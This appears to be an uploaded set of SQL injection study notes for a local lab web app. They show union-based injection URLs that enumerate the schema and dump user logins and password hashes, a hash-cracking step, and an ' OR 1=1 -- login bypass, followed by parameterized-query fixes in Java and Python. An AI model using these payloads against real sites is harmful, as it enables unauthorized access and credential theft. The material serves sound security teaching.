SQL Injection Quick Notes

Uploaded by

maaryamrh

SQL INJECTION QUICK NOTES

WORKING WITH BACK END DATABASE:


mysql -u root Connects to MySQL database management system.

show databases; Show databases

use photoblog; Select photoblog database

show tables; Show tables

select * from users; Show "users" table content



select * from pictures; Show "pictures" table content

show columns from users; Show users table structure

show columns from pictures; Show pictures table structure



select * from pictures union select * from users;
    Shows an error: the two select queries have different numbers of columns.

select title from pictures union select login from users;
    Shows column title from pictures concatenated with column login from users.

select title,img from pictures union select login,password from users;
    Shows columns title,img from pictures concatenated with columns login,password from users.

quit
    Quits mysql.

ifconfig
    Get the machine's IP address (run in the shell, not inside mysql).

WORKING WITH FRONT END WEB SITE:


In what follows, replace the IP address with your machine's IP address.

http://192.168.1.144/cat.php?id=1
    ===> select * from pictures where cat=1
    ==> Show pictures of category 1

http://192.168.1.144/cat.php?id=2
    ===> select * from pictures where cat=2
    ==> Show the other pictures, those of category 2

http://192.168.1.144/cat.php?id=2%
    ===> select * from pictures where cat=2%
    ==> Show error

http://192.168.1.144/cat.php?id=2-1
    ===> select * from pictures where cat=2-1
    ==> Show pictures of category 1 (the database evaluated 2-1, which shows the parameter is copied into the query as is)

http://192.168.1.144/cat.php?id=1+1
    ===> select * from pictures where cat=1 + 1
    ==> Show error (in a URL the + is decoded as a space, so the database does not see an addition)

http://192.168.1.144/cat.php?id=1 union select 1
    ===> select * from pictures where cat=1 union select 1
    ==> Show error, as the number of columns in the left select statement differs from that of the right select statement

http://192.168.1.144/cat.php?id=1 union select 1,2
    ===> select * from pictures where cat=1 union select 1,2
    ==> Show error, for the same reason

http://192.168.1.144/cat.php?id=1 union select 1,2,3
    ===> select * from pictures where cat=1 union select 1,2,3
    ==> Show error, for the same reason

http://192.168.1.144/cat.php?id=1 union select 1,2,3,4
    ===> select * from pictures where cat=1 union select 1,2,3,4
    ==> No error: the left select statement has 4 columns, so the union succeeds.
    Also, the image and the image title come from column number 2 of the left and right select statements.
    An attacker can therefore use column number 2 of the injected select as the place whose value gets output on the page.

http://192.168.1.144/cat.php?id=1 union select 1,@@version,3,4
    Show the MySQL version.

http://192.168.1.144/cat.php?id=1 union select 1,current_user(),3,4
    Show the current MySQL user.

http://192.168.1.144/cat.php?id=1 union select 1,database(),3,4
    Show the database currently in use: photoblog.

http://192.168.1.144/cat.php?id=1 union select 1,table_name,3,4 from information_schema.tables
    Show the names of all tables known to the MySQL DBMS.
    Among them we clearly see the database tables: categories, pictures and users.

http://192.168.1.144/cat.php?id=1 union select 1,column_name,3,4 from information_schema.columns
    Show the names of all table columns known to the MySQL DBMS.
    We clearly see the columns login and password, which belong to the table users.

http://192.168.1.144/cat.php?id=1 union select 1,login,3,4 from users
    The hacker could get the user logins easily.

http://192.168.1.144/cat.php?id=1 union select 1,password,3,4 from users
    The hacker could get the user passwords easily. Here the password is stored in hashed ("encrypted") form.

http://192.168.1.144/cat.php?id=1 union select 1,concat(login, %27:%27, password),3,4 from users
    The hacker could get each user's login and password together easily. Here the password is stored in hashed ("encrypted") form.

Go to the website www.md5online.org and try to recover the clear-text password from the hash.

The password is "P4ssw0d".

SIMPLE EXERCISE:

In the following section we will create our own table and try to hack it.

mysql -u root
    Connects to the MySQL database management system.

use photoblog;
    Select the photoblog database.

CREATE TABLE employee (employee_name varchar(250), employee_job varchar(250));
    Creates the table employee.

INSERT INTO employee (employee_name, employee_job) VALUES ('Ali Baba', 'cartoon');
    Insert the first record into the employee table.

INSERT INTO employee (employee_name, employee_job) VALUES ('Samir Sabri', 'actor');
    Insert the second record into the employee table.

SELECT * from employee;
    View the employee table content.

Go back to the browser and continue.

http://192.168.1.144/cat.php?id=1 union select 1,employee_name,3,4 from employee
    Show employee names.

http://192.168.1.144/cat.php?id=1 union select 1,concat(employee_name,%27:%27,employee_job),3,4 from employee
    Show employee names and jobs.

Hacking techniques over the login page:

If you enter login=jsmith and password=demo1234, your query becomes in the back end:

SELECT * from users where login='jsmith' and password='demo1234';

If you enter login=' and password=a, your query becomes in the back end (the quote from the input leaves the quotes unbalanced, so the query fails with a syntax error):

SELECT * from users where login=''' and password='a';

If you enter login=' OR 1=1 -- and password=demo1234, your query becomes in the back end (the -- comments out the password check, so the condition is always true):

SELECT * from users where login='' OR 1=1 --' and password='demo1234';

Parametrized queries (here in Java JDBC, where conn is an open Connection):

String query = "SELECT * FROM users WHERE login = ? AND password = ?";
PreparedStatement pstmt = conn.prepareStatement(query);
pstmt.setString(1, "' OR 1=1 --");
pstmt.setString(2, "demo1234");
ResultSet rs = pstmt.executeQuery();

===> SQL will search for users with login = ' OR 1=1 -- and password = demo1234, both compared as plain string values. The injected text is never interpreted as part of the SQL statement.
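As an added example (not code from the original notes), the string-built queries from both the cat.php section and the login section beside their parameterized forms. It uses an in-memory sqlite3 database with constructed sample rows in place of the photoblog MySQL database, and the function names are my own:

```python
import sqlite3


def setup_db():
    """Constructed sample data standing in for the notes' photoblog database."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (id INTEGER, login TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'jsmith', 'demo1234');
        INSERT INTO users VALUES (2, 'admin', 'c0ffee');
        CREATE TABLE pictures (id INTEGER, title TEXT, img TEXT, cat INTEGER);
        INSERT INTO pictures VALUES (1, 'Ruins', 'ruins.jpg', 1);
        INSERT INTO pictures VALUES (2, 'Sea', 'sea.jpg', 2);
    """)
    return con


def login_vulnerable(con, login, password):
    # Built the way the notes show: a quote in the input becomes SQL syntax,
    # and "' OR 1=1 --" turns the condition into one that is always true.
    sql = f"SELECT * FROM users WHERE login='{login}' AND password='{password}'"
    return con.execute(sql).fetchall()


def login_safe(con, login, password):
    # Parameterized: the driver passes the values separately from the statement,
    # so "' OR 1=1 --" is compared as a literal login string, never parsed as SQL.
    sql = "SELECT * FROM users WHERE login=? AND password=?"
    return con.execute(sql, (login, password)).fetchall()


def cat_vulnerable(con, id_param):
    # cat.php style: the raw id string from the URL is pasted into the query.
    return con.execute(f"SELECT * FROM pictures WHERE cat={id_param}").fetchall()


def cat_safe(con, id_param):
    # Parse the URL parameter as a whole number first; "2-1", "2%" and
    # "1 union select 1,2,3,4" are rejected here instead of reaching the database.
    try:
        cat_id = int(id_param)
    except ValueError:
        return None
    return con.execute("SELECT * FROM pictures WHERE cat=?", (cat_id,)).fetchall()


if __name__ == "__main__":
    db = setup_db()
    print(login_vulnerable(db, "' OR 1=1 --", "demo1234"))  # every user: bypass
    print(login_safe(db, "' OR 1=1 --", "demo1234"))        # [] : no such login
    print(cat_vulnerable(db, "1 union select 1,2,3,4"))     # extra row (1, 2, 3, 4)
    print(cat_safe(db, "1 union select 1,2,3,4"))           # None : rejected
```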
